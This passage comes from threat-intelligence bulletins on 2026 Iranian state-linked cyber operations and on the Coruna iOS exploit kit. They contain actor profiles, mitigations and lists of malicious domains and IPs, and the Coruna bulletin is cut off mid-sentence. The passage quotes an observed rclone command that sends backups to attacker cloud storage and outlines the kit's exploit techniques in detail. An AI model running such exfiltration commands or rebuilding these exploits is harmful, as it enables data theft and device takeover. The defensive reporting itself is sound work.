behalf of Iran's Ministry of Intelligence and Security (MOIS). Operation Olalampo, reported by GROUP-IB, observed a campaign using specialized tooling such as GhostFetch, HTTP_VIP, GhostBackDoor, and CHAR. Infrastructure was confirmed active as of March 2, 2026, including a Sliver C2 instance listening on port 31337 at 157.20.182[.]49. An open directory identified at 209.74.87[.]100 (NameCheap) was found containing FMAPP.exe alongside supporting Python and PowerShell orchestration scripts. Notably, debug strings within the CHAR malware contain emojis and unconventional Unicode sequences, which is highly consistent with AI-assisted code generation. Check Point Research further notes that MuddyWater continues to rely extensively on legitimate remote monitoring and management (RMM) tools delivered via phishing, with recent tooling assessed as potentially developed with LLM assistance. Seedworm is tracked under a separate campaign designation from MuddyWater for confirmed US network intrusion activity reported by Symantec on March 5, 2026. While significant infrastructure and behavioral overlap exists between the two actors, the Seedworm cluster is currently isolated to high-priority targets within US federal and critical infrastructure sectors during the 2026 regional escalation. MuddyWater and Seedworm should not be interpreted as entirely distinct actors, but rather as closely related operational clusters within the same broader ecosystem. Differences in naming largely reflect how intelligence is collected, segmented, and attributed over time. As visibility increases, clusters may be split, merged, or reclassified, meaning current designations represent a point-in-time analytical view rather than fixed organizational boundaries.Dust Specter is an Iran-nexus actor identified by Zscaler ThreatLabz on March 2, 2026. The group conducted targeted operations against Iraqi government officials in January 2026, impersonating the Iraqi Ministry of Foreign Affairs. Analysis confirmed four novel malware families: SPLITDROP, TWINTASK, TWINTALK, and GHOSTFORM. SPLITDROP is a 32-bit .NET dropper that decrypts an AES-256 CBC embedded payload using PBKDF2 key derivation. It subsequently extracts and launches VLC.exe, which sideloads a malicious libvlc.dll identified as TWINTASK. TWINTASK maintains persistence by polling C:\ProgramData\PolGuid\in.txt every 15 seconds for Base64-encoded PowerShell commands. Simultaneously, VLC.exe launches WingetUI.exe, which sideloads hostfxr.dll as TWINTALK, a C2 orchestrator that beacons via JWT-authenticated HTTPS with randomized delays (108–180 seconds). The C2 server employs randomized JSON key names to defeat pattern-matching detection. GHOSTFORM consolidates this functionality into a single binary featuring in-memory execution and a Google Form lure. Both TWINTALK and GHOSTFORM codebases contain emojis consistent with LLM-assisted development.APT33, also known as Elfin and Refined Kitten, is attributed to the IRGC and specializes in destructive operations against aerospace, defense, and energy sectors. Current confirmed activity includes large-scale password spraying against Microsoft 365 and Entra ID environments via TOR exit nodes, the use of AD Explorer for environment mapping, and lateral movement from IT into OT and ICS network segments. Shamoon 4.0 and Meteor are the primary destructive payloads assessed as active in the current conflict cycle.APT35, also known as Magic Hound, has confirmed active exploitation of Ivanti vulnerabilities (CVE-2024-21887, CVE-2024-21893, CVE-2024-22024), ConnectWise ScreenConnect (CVE-2024-1709), and Microsoft Exchange ProxyShell. Post-exploitation activities focus on LSASS dumping and OAuth token replay to maintain persistent access. The group is currently conducting aggressive WhatsApp-based spear-phishing against security and defense personnel and is tracked across 79 IPs and 2,211 hosts.APT42, tracked by Check Point Research under the cluster designation Educated Manticore, is an IRGC-IO affiliated actor overlapping with APT35 activity. It specializes in high-trust relationship-based access against journalists, researchers, and academics. Current methodology involves multi-channel social engineering to funnel targets toward phishing kits impersonating WhatsApp, Microsoft Teams, and Google Meet. Confirmed capabilities include location data exfiltration and the use of Google Gemini for reconnaissance and CVE-2025-8088 proof-of-concept research. The broader cluster is tracked across 54 IPs and 233 hosts. Pioneer Kitten, also known as Lemon Sandstorm and Fox Kitten, operates for Iranian state interests specializing in edge device exploitation. Confirmed exploitation of CVE-2023-3519 (Citrix ADC) and CVE-2024-21887 (Ivanti) established pre-positioned access that was subsequently repurposed for disruptive operations following the February 28 kinetic escalation. Void Manticore, operating primarily under the Handala persona, is a MOIS-affiliated hacktivist actor. On March 11, 2026, Handala conducted a confirmed cyberattack against Stryker Corporation, disrupting its global network. Stryker’s SEC disclosure confirmed the incident, which Handala claimed as retaliation for the Minab school bombing. The group claims to have extracted 50 terabytes of data and wiped thousands of systems. ISW assesses the attack as a deliberate strategy to impose political pressure on the US by targeting healthcare infrastructure. Handala has been observed operating from Starlink IP ranges since January 2026.Agrius, also known as Pink Sandstorm, is linked to the MOIS and conducts wiper and fake-ransomware operations. Initial access is frequently achieved via internet-facing web servers using commercial Israeli VPN infrastructure. During June 2025, Check Point Research observed Agrius scanning for vulnerable cameras (CVE-2023-6895, CVE-2017-7921) for bombing damage assessment, a reconnaissance capability assessed as likely active in the current period.Note on Threat Actor AttributionThreat actor attribution in this report reflects the current state of intelligence and is inherently subject to change. Iranian-aligned activity is frequently tracked under multiple overlapping designations across vendors, with clusters evolving as new intelligence is collected. Distinctions between groups may represent operational sub-clusters, shared infrastructure, or parallel tasking under a broader intelligence apparatus rather than fully discrete entities. As a result, attribution should be interpreted as directional rather than absolute.Attack Chain SummaryIran's cyber ecosystem in this conflict does not operate as a single coordinated campaign. It operates as several parallel tracks—each with distinct objectives, actors, and tooling—but sharing a common operational model: establish access early, maintain it quietly, and weaponize it when strategically advantageous.The integration of generative AI across multiple actor clusters marks the most significant doctrinal shift observed in this period. AI-generated Shodan queries are identifying exposed industrial control systems in under five minutes. Analyzed malware codebases from at least three distinct actors contained emoji-annotated code and LLM-characteristic placeholder values, indicating AI-assisted development has moved from experimentation into operational tradecraft as HarfangLabs observed in the attacks deployed by Red Kitten during protests in January 2026 (Harfang Labs, 2026).Initial access is achieved across four concurrent vectors. Internet-facing edge devices are exploited through confirmed CVEs in Citrix, Ivanti, and ConnectWise. Conflict-themed phishing using macro-enabled Office documents targets personnel across government, defense, and critical infrastructure. High-trust social engineering through WhatsApp, Teams, and Google Meet impersonation kits targets individuals with privileged access. Mobile users are targeted through smishing campaigns distributing a malicious replica of the Israeli Home Front Command RedAlert emergency alert application.Once inside, actors move deliberately. Password spray via TOR exit nodes targeted at Entra ID at scale as was observed in the Stryker incident. Lateral movement proceeds from IT into OT segments. Legitimate RMM tools including AnyDesk and ScreenConnect provide persistence that blends with normal administrative traffic. Command and control operates through Telegram dead drops, JWT-authenticated HTTPS with randomized URI paths, and Cloudflare-fronted infrastructure that masks backend servers from conventional blocking.The impact tier is the most varied; Shamoon 4.0, Meteor, BibiWiper, and MuddyViper represent the confirmed destructive payload suite. IOCONTROL directly targets IoT and fuel management OT systems. BaqiyatLock and Sicarii deploy pseudo-ransomware designed to destroy data rather than hold it for ransom. Hack-and-leak operations run through Handala, Altoufan, APT Iran, and Cyber Toufan personas amplify impact and apply reputational pressure independent of whether the underlying intrusion achieved its technical objective.Seedworm demonstrates that access was established weeks before the conflict began. The Stryker incident demonstrates what that access looks like when it is activated. The difference between the two is not capability, but intent.Phased Attack ChainsPhase I: AI-Assisted ReconnaissanceIranian-aligned actors were able to identify vulnerable devices with significantly reduced technical expertise and time. Actors operating through the Electronic Operations Room used large language models to generate complex Shodan and Google Dork queries for identifying live, internet-exposed industrial control systems in the United States and Israel. By querying for specific ports including TCP 20256 (Unitronics PLCs) and TCP 502 (Modbus), actors identified vulnerable devices in under five minutes, collapsing a process that previously required significant technical expertise and time. This AI-assisted reconnaissance represents the first documented large-scale operational application of LLM-generated targeting queries in an active kinetic conflict, fundamentally lowering the technical barrier to sophisticated ICS discovery (CloudSEK, 2026).Phase II: Multi-Vector Initial AccessPioneer Kitten (Lemon Sandstorm), assessed as operating for Iranian state interests, focused on internet-facing edge devices, exploiting CVE-2023-3519 in Citrix ADC and NetScaler alongside CVE-2024-21887 in Ivanti Connect Secure to establish pre-positioned access that was repurposed for disruptive operations once the kinetic campaign began.APT35 confirmed active exploitation of Ivanti CVE-2024-21887, CVE-2024-21893, CVE-2024-22024, ConnectWise ScreenConnect CVE-2024-1709, and Microsoft Exchange ProxyShell, alongside LSASS dumping and OAuth token replay. CVE-2025-59287 has been observed exploited in active campaigns, with IP 194.68.32[.]90 and QuxLabs infrastructure at 45.84.107[.]17 confirmed as associated with exploitation activity.Unit42 identified an active phishing campaign using a malicious replica of the Israeli Home Front Command RedAlert emergency notification application, distributed as an APK via smishing that performs mobile surveillance and data exfiltration (Unit42, 2026).MuddyWater and APT35 deployed conflict-themed spear-phishing using lures including fake security alerts, oil price reports, and national security briefings, delivered via malicious Microsoft Office documents with macro-based execution using .xlam and .ppam file types (GroupIB, 2026).💡 MuddyWater is tracked across multiple vendor frameworks under overlapping designations including Seedworm and Mango Sandstorm.Analysis of Seedworm’s intrusion found a previously undocumented backdoor named Dindoor, leveraging Deno for execution and signed with a certificate issued to Amy Cherne, was found on the networks of the Israeli operations of a US defence and aerospace software supplier, a US bank, and a Canadian non-governmental organisation. A separate Python backdoor named Fakeset, signed by certificates issued to both Amy Cherne and Donald Gay, was found on the networks of a US airport and non-profit. The Donald Gay certificate had previously been used to sign Stagecomp and Darkcomp malware, independently linked to Seedworm by Google, Microsoft, and Kaspersky. Fakeset was delivered from Backblaze cloud storage servers at gitempire.s3.us-east-005.backblazeb2[.]com and elvenforest.s3.us-east-005.backblazeb2[.]com. An Rclone-based exfiltration attempt to Wasabi cloud storage was observed with the command rclone copy CSIDL_DRIVE_FIXED\\backups wasabi:[REMOVED]:/192.168.0.x.In January 2026, Dust Specter conducted targeted operations against Iraqi government officials impersonating the Ministry of Foreign Affairs.Attack Chain 1 used SPLITDROP, a .NET dropper delivering TWINTASK and TWINTALK via DLL sideloading into legitimate VLC.exe and WingetUI.exe processes, establishing file-based command polling through in.txt and out.txt with persistence via Windows Run registry keys.Attack Chain 2 delivered GHOSTFORM, consolidating all functionality into a single binary using an invisible Windows form for delayed execution, in-memory PowerShell command execution, and a Google Form lure masquerading as an official Ministry of Foreign Affairs survey. Both malware families contain emojis and Unicode text in their codebases, strongly indicating generative AI-assisted development. The TWINTALK C2 domain meetingapp[.]site was also used in a July 2025 ClickFix attack delivering a fake Webex for Government meeting invitation with a PowerShell payload creating a scheduled task named winWebex executing every two hours. Domain overlap between Dust Specter C2 infrastructure and Dark Scepter clusters, specifically lecturegenieltd[.]pro and girlsbags[.]shop appearing across both actor profiles, indicates either shared infrastructure management or a common operational provisioning parent.Phase III: Establishing a FootholdAPT33, attributed to the IRGC and specialising in destructive operations against aerospace, defence, and energy sectors, conducts large-scale password spray attacks against Microsoft and Azure environments using TOR exit nodes to mask origin. They have been noted to use AD Explorer to map target environments and move from IT segments into OT and ICS network segments.MuddyWater's Operation Olalampo deployed GhostFetch as a first-stage in-memory downloader, HTTP_VIP as a Windows-native downloader using hardcoded C2s for AnyDesk RMM delivery, GhostBackDoor for persistent post-exploitation C2, and CHAR, a Rust-based backdoor controlled via Telegram bot stager_51_bot, identified as the MuddyWater CHAR backdoor C2 channel. CHAR's debug strings contain emojis, consistent with AI-assisted code generation and directly analogous to the same signature identified in Dust Specter's TWINTALK and GHOSTFORM.Phase IV: Impact and DestructionShamoon 4.0 represents the latest iteration of the wiper tooling first deployed against Saudi Aramco and has been identified alongside Meteor and MuddyViper as the destructive payload suite active in this conflict.Druidfly, also known as Homeland Justice and Karma, maintains BibiWiper capability pre-staged with HTTPSnoop malware, AnyDesk, ScreenConnect, and ReGeorg web shells as a recognisable pre-destructive indicator chain.Void Manticore deploys wiper tooling via a compromised Omani government mailbox delivering malicious Word documents.BaqiyatLock and Sicarii deploy pseudo-ransomware designed for data wiping rather than financial extortion, ensuring data is unrecoverable even if a ransom were paid.IOCONTROL, a custom malware used by the IRGC Cyber Electronic Command, targets IoT and OT devices including routers and fuel management systems, representing a direct capability to affect physical infrastructure at scale.Marshtreader confirmed scanning for vulnerable cameras using CVE-2023-6895 and CVE-2017-7921 across Israel during June 2025 for bombing damage assessment, with the same reconnaissance capability likely active in the current period.Cotton Sandstorm deployed WezRat and WhiteLock alongside the Altoufan persona for hack-and-leak amplification.Ashen Lepus deployed AshTag and AshenLoader targeting Palestine, Egypt, Jordan, Oman, and Morocco.Infy sustained Foudre and Tonnerre variant operations with Telegram-based C2 targeting Iranian dissidents.Mitigation StrategiesImmediate ActionsHunt for Dindoor and Fakeset now using the hashes in the IOC section, here. Look for anomalous Deno processes, outbound connections to the Backblaze delivery domains, and Rclone execution. Financial services, aviation, defence, and NGO sectors are the confirmed target profile.Revoke and reissue all Entra ID and Microsoft 365 session tokens. Enable login anomaly alerting and disable legacy authentication protocols. APT33 is actively spraying Entra ID via TOR. Educated Manticore is actively stealing session tokens through phishing kits impersonating Microsoft Teams and Google Meet.Take all ICS and OT management interfaces off the public internet unless external access can be specifically justified. Change default credentials on all ICS devices including the Unitronics PIN of 1111. Block TCP 20256, 502, 102, 44818, 1911, 4840 and UDP 47808 at the perimeter.If workloads run in AWS Bahrain or AWS UAE, initiate cross-region failover assessment and validate backups today. Amazon has confirmed physical damage. Standard availability SLAs do not apply.Patch CVE-2025-59287 as an emergency. It is under confirmed active exploitation.Healthcare organisations should review Microsoft infrastructure exposure and confirm incident response procedures are current. ISW assesses Iranian healthcare targeting as deliberate, not opportunistic. The Stryker SEC filing is the first federal cyber disclosure connected to this conflict.Hacktivist TierReduce publicly exposed personal information.Deploy and tune WAF and DDoS protection for sustained high-volume traffic.Decommission non-essential public-facing services.Monitor Telegram and forums for claims against the organization.Triage authentication from commercial VPN exit nodes including Mullvad, NordVPN, and ProtonVPN.APT and ProxyEnforce phishing-resistant MFA across all internet-facing services and VPN gateways.Implement location and device-based conditional access.Alert on VLC.exe or WingetUI.exe running from ProgramData, DLL sideloading from non-standard paths, scheduled tasks named winWebex, registry Run key modifications to ProgramData, and JWT-authenticated beaconing with randomised URI paths.Treat password-protected RAR archives with numeric passwords as high-risk. Monitor AS136557 Hosterdaddy at the ASN level.Apply JARM and JA4x fingerprinting to detect Dark Scepter backend reuse behind Cloudflare.Block the Dark Scepter and Dust Specter domain cluster as a single unit.Treat unsolicited interview, collaboration, or meeting outreach from unfamiliar personas as a probable Educated Manticore phishing attempt.OT and ICS TierValidate IT-to-OT segmentation against APT33's confirmed pivot methodology rather than assuming it holds.Restrict contractor VPN access.Maintain tested offline backups of OT configuration systems.Deploy detection logic for communication anomalies consistent with IOCONTROL targeting of routers and fuel management systems. TTPs & IOCsPriorityTypeIndicatorContext / Threat ActorCriticalDomaincodefusiontech.orgMuddyWater (Op. Olalampo) active C2CriticalDomainmeetingapp.siteDust Specter active C2 / ClickFix delivery hostCriticalDomainweb14.infoDark Scepter & Dust Specter shared C2 overlapCriticalDomainlecturegenieltd.proDark Scepter & Dust Specter infrastructure overlapCriticalDomaingirlsbags.shopDark Scepter & Dust Specter infrastructure overlapCriticalDomaingitempire.s3.us-east-005.backblazeb2.comSeedworm (MuddyWater) Fakeset deliveryCriticalDomainelvenforest.s3.us-east-005.backblazeb2.comSeedworm (MuddyWater) Fakeset deliveryCriticalIP157.20.182.49MuddyWater Sliver C2 (Hosterdaddy Private Ltd)CriticalIP194.68.32.90CVE-2025-59287 (WSUS) active exploitationCriticalIP45.84.107.17CVE-2025-59287 exploitation (QuxLabs infra)HighDomainafterworld.storeDust Specter C2HighDomainonlinepettools.shopDust Specter C2HighDomainweb27.infoDust Specter C2HighDomainwhatsapp-meeting.duckdns.orgRedKitten active phishing campaignHighDomainuppdatefile.comSeedworm network indicatorHighDomainserialmenot.comSeedworm network indicatorHighDomainmoonzonet.comSeedworm network indicatorHighDomainhandala-alert.toVoid Manticore / Handala infrastructureHighDomainhandala-hack.toVoid Manticore / Handala infrastructureHighDomainhandala.toVoid Manticore / Handala infrastructureHighDomainwestchesterisms.chandalar.comVoid Manticore / Handala associated infraHighDomainstylenhost.comVoid Manticore / Handala associated infraHighDomainstylentech.netVoid Manticore / Handala associated infraHighDomainrelayon.orgVoid Manticore / Handala associated infraHighDomainramp4u.ioVoid Manticore / Handala associated infraHighIP209.74.87.100MuddyWater open directory (NameCheap)HighIP185.236.25.119MuddyWater reset.ps1 C2 / Tsundere botnetHighIP38.180.239.161Dark Scepter backend (M247 Europe SRL)HighIP92.243.65.243Dark Scepter (Akton d.o.o. AS25467)HighIP185.76.79.125Dark Scepter (EDIS GmbH AS57169)HighIP174.138.92.189DigitalOcean C2 infrastructureHighIP23.151.8.88Void Manticore / Handala infrastructureHighIP83.110.178.217Void Manticore / Handala infrastructureHighIP80.240.30.16Void Manticore / Handala infrastructureHighIP185.178.208.137Void Manticore / Handala infrastructureHighIP192.185.17.119Void Manticore / Handala infrastructureHighIP192.142.53.75Void Manticore / Handala infrastructureHighIP103.224.212.206Void Manticore / Handala infrastructureHighIP23.94.211.166Void Manticore / Handala infrastructureHighTelegramstager_51_botMuddyWater CHAR backdoor C2 channelHighURLhxxps://shirideitch.com/.../RedAlert.apkMalicious RedAlert APK deliveryMediumDomainanythingshere.shopDark Scepter C2MediumDomaincside.siteDark Scepter C2MediumDomainfootballfans.asiaDark Scepter C2MediumDomainmenclub.ltDark Scepter C2MediumDomainmusiclivetrack.websiteDark Scepter C2MediumDomainstone110.storeDark Scepter C2MediumDomainjustweb.clickDark Scepter C2MediumDomainntcx.proDark Scepter C2MediumDomainretseptik.infoDark Scepter C2MediumDomainca.iqDust Specter (compromised govt host)MonitorDomainhandala-redwanted.toHandala leaks site (personnel targeting)Centripetal’s PerspectiveCentripetal's threat intelligence pipeline had pre-emptively deployed indicators associated with Iranian-attributed infrastructure ahead of the February 28 escalation, providing coverage against active tooling before it was widely reported.With Iran's general population under a sustained media and internet blackout for the past fortnight, two parallel observations emerged from monitoring the conflict's digital footprint.The first is behavioral. With Iran dominating global search traffic and the conflict driving sustained public interest, threat actors were observed capitalizing on public curiosity through conflict-themed lures, fake news sites, and malicious content masquerading as breaking news updates. This is consistent with observed MuddyWater and APT35 phishing lure themes documented in the phased attack chains above.Google Trends Search term “Iran” supersedes all other terms (Google, 2026)Multi-term search analysis sharpened this picture further, identifying where threat actors were identifying niches to exploit public curiosity and disseminate malicious content at scale.Google Trends Search terms with “news” (Google, 2026)The second observation is infrastructural. Analyzing the threat intelligence itself found 63.1% of Iranian CIDR triggers carry independent threat reputation beyond geographic and sanctions classification, meaning the majority have earned their place on threat feeds through observed behaviour rather than origin alone. Two factors affect how this should be interpreted.Iran's civilian internet connectivity has been confirmed at 1-4% of normal capacity since February 28. NetBlocks has since confirmed a further collapse on AS12880, a key Iranian telecoms network that had remained partially online as part of the reserved state infrastructure. With AS12880 now dark and instability confirmed on the NIN domestic intranet, the effective connectivity floor has dropped below the previously cited figure. Active signals from Iranian IP space during this period are therefore less likely to reflect routine noise, which raises analytical confidence on behavioral attribution signals. The Iranian regime has also begun arresting Starlink users, confirming it is aware that satellite connectivity represents a bypass of the domestic blackout and is actively attempting to suppress it in the general population. (France24, 2026)14 days of internet blackout (Netblocks: Mastodon, 2026)However, confidence should be tempered by the fact that residential proxy networks, VPN exit nodes, and botnets running through pre-compromised Iranian hosts can all generate Iranian-attributed traffic independent of any deliberate Iranian actor activity. A portion of the volume signals likely reflects this rather than intentional operational infrastructure.Volume signals are broad but carry proxy and botnet contamination risk. The dominant signal remains a geographic expansion product rather than independent behavioral attribution. Autonomous system reputation feeds, anonymous IP detection, and established blocklists constitute the substantive signals here but should be treated as indicative rather than confirmatory of active Iranian operational activity during the blackout.High-specificity signals are fewer but carry materially higher confidence. Iran actor intermediary feed hits, Tor exit triggers, high-confidence abuse scoring, and CVE-specific exploitation signals all require active human direction rather than passive routing, making them less susceptible to proxy contamination. With civilian and partial state infrastructure now confirmed dark, any traffic generating these signals is operating on a deliberately maintained connectivity base outside the domestic network. These are the strongest indicators of infrastructure that has been specifically kept operational through the blackout, consistent with the pre-positioned actor cells and external hosting provider clusters identified elsewhere in this report.Separately, threat intelligence providers observed Operation Overload, a Russian influence operation associated with Storm-1679 and Matryoshka, adapting its content to exploit the conflict. Media impersonation campaigns advanced fabricated security threat narratives targeting European audiences, content designed to deepen transatlantic divisions, and messaging aimed at eroding Western support for Ukraine aid.Where This Leaves DefendersThe most consequential risk of this conflict is the activation of already established access in organizations across North America, Europe, and the wider Middle East. Observed tradecraft spans multi-vector initial access, persistence through legitimate RMM and living-off-the-land techniques, and command-and-control via Telegram dead drops and cloud-fronted infrastructure. The impact tier includes destructive tooling, pseudo-ransomware, and hack-and-leak operations intended to impose political pressure, alongside the cyber implications of regional infrastructure disruption, including kinetic targeting of commercial cloud infrastructure.Defenders should treat this as a sustained elevated threat period rather than an acute event. Prioritization of mitigation measures including those referenced in this report would serve to reduce immediate exposure, and use the IOC tables as a practical blocking and hunting reference, starting with indicators tied to confirmed active exploitation and observed intrusions.Resourceshttps://www.reuters.com/graphics/IRAN-CRISIS/MAPS/znpnmelervl/#attack-on-irans-power-structurehttps://www.broadcom.com/support/security-center/protection-bulletin/seedworm-apt-group-activity-following-u-s-and-israeli-military-strikes-on-iranhttps://research.checkpoint.com/2026/handala-hack-unveiling-groups-modus-operandi/https://www.investing.com/news/sec-filings/stryker-reports-cybersecurity-incident-causing-global-it-disruptions-93CH-4555827https://unit42.paloaltonetworks.com/iranian-cyberattacks-2026/https://cybermagazine.com/news/iran-war-cyber-and-kinetic-warfare-convergehttps://blog.checkpoint.com/research/what-defenders-need-to-know-about-irans-cyber-capabilities/https://www.cyderes.com/howler-cell/crisis-in-iran-new-chapter-cyber-conflicthttps://flashpoint.io/blog/escalation-in-the-middle-east-operation-epic-fury/https://www.nozominetworks.com/blog/iranian-apt-activity-during-geopolitical-escalation-recommendations-for-nozomi-customers-and-critical-infrastructure-ownershttps://unit42.paloaltonetworks.com/iranian-cyberattacks-2026/https://www.sentinelone.com/blog/sentinelone-intelligence-brief-iranian-cyber-activity-outlook/https://x.com/Cyberknow20/status/2028454796077019583https://www.ncsc.gov.uk/news/ncsc-advises-uk-organisations-take-action-following-conflict-in-middle-easthttps://www.wired.com/story/hacked-prayer-app-sends-surrender-messages-to-iranians-amid-israeli-strikes/https://techcrunch.com/2026/03/03/hacked-traffic-cams-and-hijacked-tvs-how-cyber-operations-supported-the-war-against-iran/https://techcrunch.com/2026/03/02/hackers-and-internet-outages-hit-iran-amid-u-s-air-strikes/https://www.proofpoint.com/us/blog/threat-insight/iran-conflict-drives-heightened-espionage-activity-against-middle-east-targetshttps://unit42.paloaltonetworks.com/iranian-cyberattacks-2026/https://blog.checkpoint.com/research/what-defenders-need-to-know-about-irans-cyber-capabilities/#:~:text=Handalahttps://www.france24.com/en/live-news/20260313-how-iranians-are-communicating-through-internet-blackouthttps://www.threathunter.ai/blog/iran-handala-stryker-detection-pack-v2https://www.threathunter.ai/blog/iranian-threat-actor-tools-techniques-iocs-ioas/https://www.zscaler.com/blogs/security-research/dust-specter-apt-targets-government-officials-iraqhttps://therecord.media/iran-cyber-us-command-attackhttps://research.checkpoint.com/2026/handala-hack-unveiling-groups-modus-operandi/https://unit42.paloaltonetworks.com/iranian-cyberattacks-2026/https://harfanglab.io/insidethelab/redkitten-ai-accelerated-campaign-targeting-iranian-protests/https://www.cloudsek.com/blog/ai-the-iran-us-conflict-and-the-threat-to-us-critical-infrastructurehttps://www.group-ib.com/blog/muddywater-espionage/https://unit42.paloaltonetworks.com/iranian-cyberattacks-2026/ --- ### [Coruna iOS Exploit Kit: Observed Traffic Across Education and Government Sectors](https://www.centripetal.ai/threat-research/coruna-ios-exploit-kit) Published: 2026-03-16 Summary: Coruna iOS exploit kit targets iPhones running iOS 13–17.2.1. This bulletin analyzes the PLASMAGRID malware, exploit chain, and activity across education and government. Coruna, an iOS exploitation framework containing full exploit chains and 23 individual exploits targeting iPhone models running iOS 13.0 through iOS 17.2.1, has been identified. The same kit is also under the name CryptoWaters.Coruna's proliferation has been tracked across three distinct threat actors: a commercial surveillance vendor customer, UNC6353, a suspected Russian espionage group that conducted watering hole attacks against Ukrainian users, and UNC6691, a financially motivated threat actor operating from China (Google, 2026).iVerify describes this as the first observed mass exploitation of iOS devices by a criminal group using nation-state-grade tools (iVerify, 2026). The codebase contains extensive inline documentation and comments written in native-level English (Google, 2026). Both Google and iVerify have noted that some of the exploits reuse vulnerabilities from the 2023 Operation Triangulation campaign discovered by Kaspersky. The definitive origin of the Coruna framework has not been established by any reporting party.On March 7, 2026, two days after Google's publication, CISA added CVE-2023-41974 to their Known Exploited Vulnerabilities catalogue with a remediation deadline of March 26, 2026. This kernel use-after-free vulnerability (CVSS 3.1: 7.8 HIGH) represents the kernel privilege escalation component of the Coruna chain, and the NVD entry directly references Google's Coruna blog post as an exploit source (NadSec, 2026).Campaign DetailsUNC6691 deployed the Coruna exploit kit across a large set of fake Chinese websites predominantly themed around finance and cryptocurrency. The final payload, tracked as PLASMAGRID and using the identifier com.apple.assistd, is a stager that injects itself into the iOS powerd daemon running as root (Google, 2026).iVerify's independent technical analysis reveals a multi-stage post-exploitation architecture. The initial implant running in powerd acts as a second stage, checking in with a command and control server to retrieve a configuration file and load a third stage component referred to internally as CorePayload. CorePayload executes within the locationd process and orchestrates all subsequent activity, including downloading and injecting additional modules into running processes. The imagent process is injected with a module that takes over C2 communication and includes a backup channel over SMS and iMessage. A separate module is injected into SpringBoard, which communicates with the locationd implant rather than directly with C2 infrastructure. None of the injected modules are code signed (iVerify, 2026).PLASMAGRID's capabilities are financially motivated. The payload can decode QR codes from images stored on disk, analyze text blobs for BIP39 seed phrases and keywords such as "backup phrase" or "bank account," and exfiltrate matching content from Apple Memos to attacker-controlled C2 infrastructure. The locationd implant also directly inspects photos and Apple Notes on the device and uploads them. The malware additionally harvests photographs and emails beyond cryptocurrency wallet data (Google, 2026; iVerify, 2026).The payload retrieves a remote configuration from its C2 to load additional modules targeting installed applications. Google identified 18 such modules targeting cryptocurrency wallet applications including MetaMask, Trust Wallet, Phantom, Uniswap, and TonKeeper (Google, 2026). iVerify's independent analysis recovered additional modules targeting WhatsApp and OKEx, indicating the kit is in active development and expanding its target set beyond the applications documented in Google's initial reporting (iVerify, 2026).The exploit code features extensive documentation authored in native English, whilst the PLASMAGRID modules contain logging strings written in Chinese and some comments that may be LLM generated. This linguistic separation suggests the original exploit developers are distinct from UNC6691 (Google, 2026). PLASMAGRID communicates over HTTPS, encrypting collected data with AES. The implant contains hardcoded C2 domains and a fallback domain generation algorithm seeded with the string "lazarus" that produces 15 character domains under the .xyz TLD.The malware lacks persistence and resides primarily in RAM. Restarting an infected device clears the infection, though the device can be reinfected if the user revisits a malicious site. NadSec's analysis of the JavaScript source confirms that the entire chain from watering hole landing to data exfiltration executes within the browser process without dropping any files to disk (NadSec, 2026). Affected users should reset passwords for any online services accessed from their device and enable two factor authentication on all critical accounts (iVerify, 2026).Figure One: Coruna iOS exploit kit timeline (Google, 2026)Delivery & Attack ChainWhen a user visits a UNC6691-controlled or compromised website from an iOS device, a hidden iFrame is injected that delivers the exploit kit. The framework fingerprints the device to determine the iPhone model and iOS version, then selects the appropriate WebKit remote code execution exploit followed by a pointer authentication code bypass. Post RCE, a binary loader delivers the next stage exploit chain payloads (Google, 2026). The chain has been characterised as a one-click exploit consisting of remote code execution in Safari and a local privilege escalation that allows attackers to take full control over infected devices. No user interaction is required beyond visiting the page (iVerify, 2026).The exploit chains did not contain any specific targeting or one-time links. Any user visiting a delivery site with a vulnerable iOS version could be infected, and iVerify confirmed the ability to reinfect devices multiple times (iVerify, 2026).The exploit chains leverage a mix of publicly known CVEs and non-public exploitation techniques. Key vulnerabilities within the kit include CVE-2024-23222, a WebKit type confusion vulnerability used for initial RCE on iOS 16.6 through 17.2.1; CVE-2022-48503, used for WebKit memory access on iOS 15.2 through 15.5; and CVE-2023-32409 and CVE-2023-32434, which provide sandbox escape and kernel privilege escalation respectively. CVE-2023-32434 and CVE-2023-38606 were also exploited as zero days in Operation Triangulation, discovered by Kaspersky in 2023 (Google, 2026). CVE-2023-41974, a kernel use-after-free added to the CISA KEV on 7 March 2026, provides the kernel privilege escalation that follows the WebKit RCE and PAC bypass stages (NadSec, 2026). The kit additionally includes advanced techniques to bypass Apple's Pointer Authentication Code and Page Protection Layer mitigations across multiple iOS versions.CVE IdentifierVulnerability TypeTargeted iOS VersionsRole in Attack ChainCVE-2024-23222WebKit Type Confusion16.6 through 17.2.1Initial RCE: Executes malicious code via the browser.CVE-2022-48503WebKit Out-of-Bounds Memory Access15.2 through 15.5Information Leak: Aids in bypassing memory protections.CVE-2023-32409WebKit Sandbox EscapeVariousSandbox Escape: Allows the exploit to break out of the browser's restricted environment.CVE-2023-32434Kernel Integer OverflowVariousPrivilege Escalation: Grants the attacker root/kernel-level access.CVE-2023-38606Kernel Hardware Register StateVariousMitigation Bypass: Used to circumvent Apple’s Page Protection Layer (PPL).CVE-2023-41974Kernel Use-After-Free (CWE-416)Pre-iOS 17Kernel Privilege Escalation: Added to CISA KEV on 7 March 2026 (CVSS 3.1: 7.8 HIGH).NadSec's reverse engineering of the JavaScript source provides additional detail on the post-RCE exploitation mechanics that Google described as "non-public exploitation techniques." The kit contains three independent WebKit RCE paths selected at runtime based on platform and Safari version: a NaN-boxing type confusion for macOS, a JIT structure check elimination with a Web Worker retry mechanism as a macOS fallback, and an OfflineAudioContext heap corruption chain combined with SVG attribute manipulation for iOS. All three converge on a common arbitrary memory read/write primitive (NadSec, 2026).From that primitive, the chain progresses through four escalation stages. A 306-byte WebAssembly module constructed inline in JavaScript is compiled and its dispatch pointer hijacked to convert the Wasm sandbox into a native function call primitive. This enables a PAC bypass implemented as a confused deputy attack; rather than forging PAC signatures, the exploit temporarily swaps unsigned Global Offset Table entries in Apple's own system frameworks, then triggers legitimate PAC-authenticated call paths that read the attacker-substituted data. The original values are restored immediately after execution. The exploit then allocates read-write-execute memory via mach_vm_allocate from inside the WebContent sandbox, and finally bypasses Apple's JIT cage code integrity verification by reimplementing the PACDB rolling hash algorithm in JavaScript, using the hardware's own per-process PAC keys to produce valid signatures for arbitrary shellcode. The kernel cannot distinguish these forged hashes from legitimate JIT compilations (NadSec, 2026).The delivery framework performs multiple validation checks. The initial RCE stage verifies the device is running iOS in Safari, checks for the presence of Lockdown Mode, and terminates if detected. The local privilege escalation stage checks for the presence of 